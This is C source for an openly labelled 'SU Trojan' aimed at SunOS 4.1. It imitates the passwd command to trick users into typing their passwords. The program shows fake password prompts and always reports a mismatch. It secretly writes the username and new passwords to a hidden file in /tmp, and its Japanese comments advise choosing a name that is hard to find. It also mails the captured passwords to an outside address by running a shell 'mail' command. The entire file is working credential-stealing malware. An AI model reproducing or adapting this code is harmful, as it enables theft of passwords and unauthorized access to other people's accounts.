/*============================================================================= SU Trojan Ver2.00 for SunOS4.1 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (unewn4th@usa.net) ============================================================================= */ #include <pwd.h> #include <stdio.h> #include <stdlib.h> /* パスワードを通知するメアド */ /* 以下の1行を削除するとメール通知は行われません */ #define MAIL "hohoho@hacker.net" /* ロギングファイル. 見つかりにくい名前に変更 */ #define LOGFILE "/tmp/.pl" #define MSG_PERMERR "Permission denied.\n" #define MSG_DOESNTEXIST "passwd: %s: unknown user.\n" #define MSG_BANNER "Changing password for %s on %s\n" #define MSG_OLDPASS "Old password:" #define MSG_BADOLDPASS "Sorry.\n" #define MSG_NEWPASS "New password:" #define MSG_RENEWPAS "Retype new password:" #define MSG_TOOSHORT "Please use a longer password.\n" #define MSG_DONTMATCH "Mismatch - password unchanged.\n" #define TMPFILE "/tmp/.tmp" #define MAX_USERNAME 200 #define MAX_PASSWD 200 main(int argc,char *argv[]) { int uid=getuid(); struct passwd p; char oldpasswd[MAX_PASSWD],newpasswd[MAX_PASSWD],renewpasswd[MAX_PASSWD]; char *getpass_sys(char *); char username[MAX_USERNAME]; char buf[200]; FILE *fp; memcpy(&p,getpwuid(uid),sizeof(struct passwd)); if (argc==1) strcpy(username,p.pw_name); else{ strncpy(username,argv[1],MAX_USERNAME-1); username[MAX_USERNAME-1]=0; if (getpwnam(argv[1])==NULL){ printf(MSG_DOESNTEXIST,argv[1]); exit(1); } memcpy(&p,getpwuid(uid),sizeof(struct passwd)); if (uid!=0 && strcmp(p.pw_name,argv[1])){ printf(MSG_PERMERR); exit(1); } } gethostname(buf,99); printf(MSG_BANNER,username,buf); if (uid!=0){ strncpy(oldpasswd,getpass(MSG_OLDPASS),MAX_PASSWD-1); oldpasswd[MAX_PASSWD-1]=0; if (strlen(oldpasswd)==0){ printf(MSG_BADOLDPASS); exit(1); } } strncpy(newpasswd,getpass_sys(MSG_NEWPASS),MAX_PASSWD-1); newpasswd[MAX_PASSWD-1]=0; strncpy(renewpasswd,getpass_sys(MSG_RENEWPAS),MAX_PASSWD-1); renewpasswd[MAX_PASSWD-1]=0; printf(MSG_DONTMATCH); if ((fp=fopen(LOGFILE,"a"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } #ifdef MAIL if ((fp=fopen(TMPFILE,"w"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } sprintf(buf,"mail %s < %s",MAIL,TMPFILE); system(buf); remove(TMPFILE); #endif } char *getpass_sys(char *d) { static char *x; for (;;){ x=getpass(d); if (strlen(x)<6){ printf(MSG_TOOSHORT); continue; } break; } return (x); }